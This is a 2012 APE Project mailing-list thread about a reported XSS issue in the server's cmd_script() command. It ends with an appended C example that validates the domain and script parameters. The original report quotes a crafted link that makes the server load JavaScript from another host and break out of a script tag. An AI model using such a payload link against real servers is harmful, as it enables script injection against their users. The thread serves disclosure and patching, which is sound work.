I think this XSS vulnerability is no more of a threat than the browser console or the browser address bar, for that matter. As mentioned above, the script command just sandboxes the passed JS script files into a separate DOM. In other words it just generates an HTML file with the JavaScript file provided.

The generated HTML file does nothing on its own, and even if embedded in your page in an iFrame it is limited to seeing and doing what any user could do from the browser console or the browser address bar. In fact the JS (no mootools) framework uses this command to sandbox the mootools base framework in an iFrame, as can be seen in https://github.com/APE-Project/APE_JSF/blob/master/Build/uncompressed/apeClientJS.js#L136

This command could have been a threat if JavaScript were internally evaluated by the framework, which not even code encapsulation would help with. But this is not the case. The scope of my knowledge makes me conclude that there is no XSS vulnerability here, but I could be wrong.

On Dec 13, 2012 5:12 AM, "tr!ckle" <[email protected]> wrote:

> This function composes an HTML document which has only scripts and puts it to the client. As I mentioned before, it allows you to put whatever you want into this document by preparing a link. If you have a BAD JSON error, just check your link, it may be some typo in it (or in my first post, but I didn't find any).
>
> Workaround:
> 1. check if domain is valid (cmd.c line 470)
> 2. check if script is valid (cmd.c line 477)
>
> And that's it.
> I hope this is helpful.
>
> On Thursday, 13 December 2012 05:35:06 UTC+1, UTAN wrote:
>
>> Ok, give me a shout out if you got more info, since I am testing on my testbed server..
>>
>> On Dec 12, 8:30 pm, Pablo Tejada <[email protected]> wrote:
>>
>>> I took a look at the cmd_script() and I'm no C savvy but I don't think that command does what we think it does.
>>>
>>> I personally thought it injected javascript directly into the server environment but it doesn't look like it, I have to test it and see.
>>>
>>> On Dec 12, 2012 11:09 PM, "UTAN" <[email protected]> wrote:
>>>
>>>> Pablo,
>>>>
>>>> I don't seem to duplicate it.
>>>> I have put your hook as follows
>>>>
>>>>     Ape.registerHookCmd('script', function(){
>>>>         Ape.log('Script was called successfully');
>>>>         //return false;
>>>>     });
>>>>
>>>> and tried to run through the Ape server URL .. and it doesn't log anything...
>>>> But managed to find the function in that file mentioned above..
>>>>
>>>> On Dec 12, 4:58 pm, Pablo Tejada <[email protected]> wrote:
>>>>
>>>>> You would have to patch the file, rebuild the server and replace the generated aped file with the one in your installation.
>>>>>
>>>>> Before digging into the source can you verify if the hook I mentioned above fixes this bug?
>>>>>
>>>>> On Dec 12, 2012 7:52 PM, "UTAN" <[email protected]> wrote:
>>>>>
>>>>>> Indeed, thanks for pointing it out Pablo..
>>>>>> Now should I just edit and patch the file and then reload Ape, or do I have to reinstall all over?
>>>>>>
>>>>>> On Dec 12, 10:20 am, Pablo Tejada <[email protected]> wrote:
>>>>>>
>>>>>>> He did mention src/cmd.c
>>>>>>>
>>>>>>> On Dec 12, 2012 1:15 PM, "UTAN" <[email protected]> wrote:
>>>>>>>
>>>>>>>> Have you released any patch? If you made some workaround, what file should we patch?
>>>>>>>>
>>>>>>>> On Dec 11, 3:56 am, tr!ckle <[email protected]> wrote:
>>>>>>>>
>>>>>>>>> I recently ran into an issue that allows injecting any js script by preparing a link like:
>>>>>>>>>
>>>>>>>>> http://your.ape.server.domain/?[{%22cmd%22:%22script%22,%22params%22:{%22domain%22:%22any.domain%22,%22scripts%22:[%22http://another.domain.com/your/injected/script.js%5C%22%3E%3C%2Fscrip...]}}]
>>>>>>>>>
>>>>>>>>> It allows either attaching a script from your url or injecting script directly, such as in this example.
>>>>>>>>>
>>>>>>>>> The solution for this issue is to filter both params domain and scripts in file src/cmd.c (function: cmd_script()) in the ape server.

--
You received this message because you are subscribed to the Google Groups "APE Project" group.
To post to this group, send email to [email protected]
To unsubscribe from this group, send email to [email protected]
For more options, visit this group at http://groups.google.com/group/ape-project?hl=en
---
APE Project (Ajax Push Engine)
Official website : http://www.ape-project.org/
Git Hub : http://github.com/APE-Project/
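The workaround tr!ckle describes (check that "domain" is valid, check that each "scripts" entry is valid, before cmd_script() composes the HTML page) is small enough to show in full. The following C is an added example written for this thread, not APE's cmd.c and not the patch anyone in the thread shipped: the function names, the page layout (a document.domain assignment followed by one script tag per URL) and the sample inputs, modelled on the quoted link, are all assumptions. It rejects a domain that is not a plain hostname and a script entry that is not an absolute http(s) URL, and additionally HTML-escapes the src attribute, so the closing-quote-and-tag trick in the thread's link is refused before it reaches the page rather than relying on the browser to cope with it.

```c
#include <ctype.h>
#include <stdbool.h>
#include <stddef.h>
#include <string.h>

/* Illustrative stand-ins for the two checks the workaround names (validate
   "domain", validate each entry of "scripts"); this is not APE's cmd.c. */

/* Accept only a plain hostname: labels of [A-Za-z0-9-] joined by single dots,
   no leading/trailing '-' or '.', label <= 63, total <= 253. Quotes, angle
   brackets, slashes, backslashes and spaces are all rejected. */
bool script_domain_is_valid(const char *d)
{
    size_t len = strlen(d), label = 0;
    if (len == 0 || len > 253 || d[0] == '-' || d[len - 1] == '-' || d[len - 1] == '.') return false;
    for (size_t i = 0; i < len; i++) {
        if (d[i] == '.') { if (label == 0 || d[i - 1] == '-') return false; label = 0; }
        else if (isalnum((unsigned char)d[i]) || d[i] == '-') { if (d[i] == '-' && label == 0) return false; label++; }
        else return false;
        if (label > 63) return false;
    }
    return true;
}

/* Accept only an absolute http(s) URL with a host, built from the characters a
   URL may carry once percent-encoded. A raw '"', '<', '>', '\\' or space,
   which the crafted link in the thread relies on, fails this check. */
bool script_url_is_valid(const char *url)
{
    const char *rest;
    if (strncmp(url, "https://", 8) == 0) rest = url + 8;
    else if (strncmp(url, "http://", 7) == 0) rest = url + 7;
    else return false;
    if (*rest == '\0' || *rest == '/' || strlen(url) > 2048) return false;
    for (const char *p = rest; *p; p++) {
        unsigned char c = (unsigned char)*p;
        if (!isalnum(c) && !strchr("-._~:/?#[]@!$&'()*+,;=%", c)) return false;
    }
    return true;
}

/* Bounded append: fails instead of overflowing the output buffer. */
static bool append(char *out, size_t outsz, size_t *pos, const char *s)
{
    size_t n = strlen(s);
    if (*pos + n >= outsz) return false;
    memcpy(out + *pos, s, n);
    *pos += n;
    out[*pos] = '\0';
    return true;
}

/* Append with HTML attribute escaping, for values placed inside src="...". */
static bool append_attr(char *out, size_t outsz, size_t *pos, const char *s)
{
    for (; *s; s++) {
        char one[2] = { *s, '\0' };
        const char *rep = *s == '&' ? "&amp;" : *s == '<' ? "&lt;" : *s == '>' ? "&gt;"
                        : *s == '"' ? "&quot;" : *s == '\'' ? "&#39;" : one;
        if (!append(out, outsz, pos, rep)) return false;
    }
    return true;
}

/* Build the script-only page: refuse any invalid parameter up front, then emit
   one <script src> per URL. The layout is an assumption about what cmd_script()
   produces. Returns bytes written, or -1 on rejection or overflow. The domain
   lands inside a <script> body, where entity escaping does not apply; that is
   safe only because script_domain_is_valid() limited it to [A-Za-z0-9.-]. */
int build_script_page(const char *domain, const char *const *scripts,
                      size_t nscripts, char *out, size_t outsz)
{
    size_t pos = 0;
    if (outsz == 0 || !script_domain_is_valid(domain)) return -1;
    for (size_t i = 0; i < nscripts; i++)
        if (!script_url_is_valid(scripts[i])) return -1;
    out[0] = '\0';
    if (!append(out, outsz, &pos, "<html><head><script>document.domain=\"") ||
        !append(out, outsz, &pos, domain) ||
        !append(out, outsz, &pos, "\";</script>")) return -1;
    for (size_t i = 0; i < nscripts; i++)
        if (!append(out, outsz, &pos, "<script src=\"") ||
            !append_attr(out, outsz, &pos, scripts[i]) ||
            !append(out, outsz, &pos, "\"></script>")) return -1;
    if (!append(out, outsz, &pos, "</head><body></body></html>")) return -1;
    return (int)pos;
}

/* Constructed inputs modelled on the link quoted in the thread. */
static const char *good_scripts[] = { "http://another.domain.com/your/injected/script.js" };
static const char *bad_scripts[] = { "http://another.domain.com/your/injected/script.js\"></script>" };

/* The page built from the benign entry, or NULL if it was refused. */
const char *demo_page(void)
{
    static char buf[1024];
    return build_script_page("any.domain", good_scripts, 1, buf, sizeof buf) > 0 ? buf : NULL;
}

/* True when the entry carrying a quote and a closing tag is refused outright. */
bool demo_rejects_injection(void)
{
    char buf[1024];
    return build_script_page("any.domain", bad_scripts, 1, buf, sizeof buf) == -1;
}
```

Calling demo_page() yields a page whose only script tag is the clean URL, and demo_rejects_injection() returns true because the second entry fails script_url_is_valid() before any HTML is assembled. The Ape.registerHookCmd hook UTAN tried is a separate, runtime way to refuse the command; the checks above are the kind of thing the thread says belongs in cmd_script() itself, so the parameters are rejected regardless of what the server-side JS does.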
